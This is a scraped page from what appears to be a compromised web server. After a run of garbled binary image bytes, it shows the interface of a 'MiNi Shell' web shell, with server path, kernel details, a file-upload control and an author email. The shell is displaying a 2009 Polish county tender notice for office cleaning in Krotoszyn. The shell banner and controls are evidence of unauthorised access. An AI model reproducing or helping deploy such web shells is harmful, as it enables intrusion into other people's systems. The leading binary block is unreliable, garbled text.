JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/33951-N-2009.html

<p class="kh_header"><b>Krotoszyn: Sprzątanie pomieszczeń biurowych, ciągów komunikacyjnych i sanitariatów oraz mycie okien w Starostwie Powiatowym w Krotoszynie</b><br>
<b>Numer ogłoszenia: 33951 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń biurowych, ciągów komunikacyjnych i sanitariatów oraz mycie okien w Starostwie Powiatowym w Krotoszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie pomieszczeń biurowych, ciągów komunikacyjnych i sanitariatów oraz mycie okien w Starostwie Powiatowym w Krotoszynie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do postępowania przetargowego zostaną dopuszczeni Oferenci spełniający następujące wymagania:

a)	złożą prawidłową pod względem prawnym  ofertę,
b)	posiadają niezbędne uprawnienia do występowania w obrocie prawnym oraz do wykonywania prac objętych przetargiem, złożą wypis z rejestru handlowego lub z ewidencji działalności gospodarczej potwierdzający dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem 
c)	spełniają  wymagania art. 22 ust. 1 oraz nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
d)	znajdują się w sytuacji  technicznej oraz dysponują personelem pozwalającym na wykonanie zamówienia,  
e)	wykażą się  realizacją 3 zamówień  zrealizowanych z należytą starannością, odpowiadającym swoim rodzajem i wartością  pracom stanowiącym   przedmiot zamówienia
f)	zaakceptują wzór umowy
2. Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w niniejszej SIWZ dołączonych do oferty na zasadzie spełnia-nie spełnia. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać ,iż Wykonawca   spełnia  wymienione  warunki. Uzupełnienie wymaganych dokumentów będzie możliwe  po upływie terminu składania ofert, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. W przypadku wątpliwości co do treści dokumentów złożonych przez wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. Nie spełnienie jakiegokolwiek ww. warunku spowoduje odrzucenie oferty. Oferent o tym fakcie zostanie niezwłocznie powiadomiony przez Zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty:

a)	Wypełniony formularz ofertowy  wg załączonego wzoru 
b)	Oświadczenie o spełnianiu  wymagań art. 22 ust. 1 oraz nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
c)	Dokumenty potwierdzające spełnienie przez wykonawców warunków o których mowa w art. 26 ust. 2 ustawy prawo zamówień publicznych (j.t. Dz.U. z 2007 r. Nr 223, poz.1655 z późniejszymi zmianami) jak również dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja  2006 r.  w sprawie rodzajów  dokumentów, jakich  może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  tj:
	aktualny wystawiony nie wcześniej niż 6 miesięcy przed terminem upływu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym tym zamówieniem  
d)	Wykaz minimum trzech zamówień zrealizowanych z należytą starannością w ciągu ostatnich 3 lat ( rozpoczętych i zakończonych w okresie 2006-2008 r.) , wraz z referencjami z kontaktem telefonicznym do osób po stronie zamawiających odpowiedzialnych za realizacje zamówienia  i referencjami 
e)	Wykaz osób przewidzianych do realizacji  zadania
f)	Oświadczenie Wykonawcy, ze  osoby przewidziane do realizacji zamówienia nie były karane  
g)	Podpisany wzór umowy 
2. W przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą zobowiązany jest  złożyć dokumenty wyszczególnione w pkt. 1, 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Dokument lub dokumenty, o których mowa w  pkt. 2  musza być złożone w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski i poświadczonych przez wykonawcę za zgodność z oryginałem.

W przypadku, gdy wykonawca w miejsce któregoś z dokumentów, o których mowa w SIWZ dostarczy jego kopie, kopia ta musi być poświadczona za zgodność z oryginałem przez wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości).
1.	 Zgodnie z art. 23 ust.1-3 wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (tzw, konsorcjum).
a)	korespondencja oraz rozliczenia dokonywane będą  z Wykonawcą wskazanym i upoważnionym w pełnomocnictwie przez pozostałych Wykonawców
2.	Wykonawcy wspólnie ubiegający się  o udzielenie zamówienia muszą spełnić następujące warunki:
a)	przedłożą umocowanie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego 
b)	termin na jaki zawarta została umowa konsorcjum nie może być  krótszy niż  termin realizacji zamówienia. Przed podpisaniem umowy o udzielenie zamówienia Zamawiający może żądać  przedłożenia zawartej umowy konsorcjum. Umowa ta musi określać: sposób współdziałania podmiotów, zakres prac przewidzianych do wykonania przez każdego z nich, zasady reprezentacji (wyznaczenie lidera upoważnionego do  podejmowania zobowiązań), zasady odpowiedzialności zgodnie z ustawa Prawo zamówień publicznych oraz Kodeksem Cywilnym
c)	podmioty występujące wspólnie  ponoszą solidarną odpowiedzialność za nie wykonanie lub nienależyte wykonanie zamówienia 

3.	Ponadto 

Warunki odnoszące się  do wiarygodności poszczególnych wykonawców składających  ofertę wspólną:
a) Dokumenty potwierdzające spełnienie przez wykonawców warunków o których mowa w art. 26 ust. 2 ustawy prawo zamówień publicznych  jak również dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006 r.  w sprawie rodzajów  dokumentów jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być  składane tj
	aktualny wystawiony nie wcześniej niż 6 miesięcy przed terminem upływu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym tym zamówieniem  


b)	Złożą oświadczenie o spełnianiu  wymagań art. 22 ust. 1 oraz o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 

                   Warunki odnoszące się do potencjału wspólnego tych podmiotów:
a)	Wypełniony formularz ofertowy  wg załączonego wzoru - Załącznik nr 2
b)	Oświadczenie o spełnianiu  wymagań art. 22 ust. 1 oraz nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
c)	Dokumenty potwierdzające spełnienie przez wykonawców warunków o których mowa w art. 26 ust. 2 ustawy prawo zamówień publicznych (j.t. Dz.U. z 2007 r. Nr 223, poz.1655 z późniejszymi zmianami) jak również dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja  2006 r.  w sprawie rodzajów  dokumentów, jakich  może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  tj:
	aktualny wystawiony nie wcześniej niż 6 miesięcy przed terminem upływu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym tym zamówieniem  
d)	Wykaz minimum trzech zamówień zrealizowanych z należytą starannością w ciągu ostatnich 3 lat ( rozpoczętych i zakończonych w okresie 2006-2008 r.) , wraz z referencjami z kontaktem telefonicznym do osób po stronie zamawiających odpowiedzialnych za realizacje zamówienia  i referencjami 
e)	Wykaz osób przewidzianych do realizacji  zadania 
f)	Oświadczenie Wykonawcy, ze  osoby przewidziane do realizacji zamówienia nie były karane  
g)	Podpisany wzór umowy 

Brak któregokolwiek z wyżej wymienionych dokumentów lub przedstawienie ich w niewłaściwej formie spowoduje wykluczenie Oferenta z dalszego postępowania ( art. 24 ust. 2 pkt.  3ustawy Prawo zamówień publicznych ) z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych)
	Wszystkie dokumenty przedstawione w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez osoby uprawnione..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.starostwo.krotoszyn.pl/pdf/zamowienia/siwz1.pdf.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.bip.starostwo.krotoszyn.pl/pdf/zamowienia/siwz1.pdf
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com